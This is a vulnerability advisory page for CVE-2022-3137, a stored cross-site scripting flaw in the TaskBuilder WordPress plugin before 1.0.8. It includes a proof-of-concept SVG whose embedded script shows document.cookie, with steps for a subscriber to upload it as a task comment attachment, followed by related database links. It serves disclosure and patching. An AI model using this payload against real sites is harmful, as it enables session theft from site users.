Lucene search
Rizacan TufanWPEX-ID:524928D6-D4E9-4A2F-B410-46958DA549D8HistorySep 15, 2022 - 12:00 a.m.
TaskBuilder < 1.0.8 - Subscriber+ Stored XSS via SVG file upload
2022-09-1500:00:00
Rizacan Tufan
71
taskbuilder
stored xss
svg file upload
subscriber
authenticated user
vulnerability
admin page
comment
file attachment
exploit
url
.
EPSS
0.001
Percentile
24.8%
The plugin does not validate and sanitise task’s attachments, which could allow any authenticated user (such as subscriber) creating a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file
Create a SVG with the following content:
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
As any authenticated user, such as subscriber:
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any tasks (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL (https://example.com/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU), which will trigger the XSSRelated
wpvulndb
wpvulndb
TaskBuilder < 1.0.8 - Subscriber+ Stored XSS via SVG file upload
2022-09-15 00:00:00
prion
prion
Cross site scripting
2022-10-10 21:15:00
cvelist
cvelist
patchstack
patchstack
cnvd
cnvd
WordPress Taskbuilder Cross-Site Scripting Vulnerability
2022-10-12 00:00:00
nvd
nvd
CVE-2022-3137
2022-10-10 21:15:11
cve
cve
CVE-2022-3137
2022-10-10 21:15:11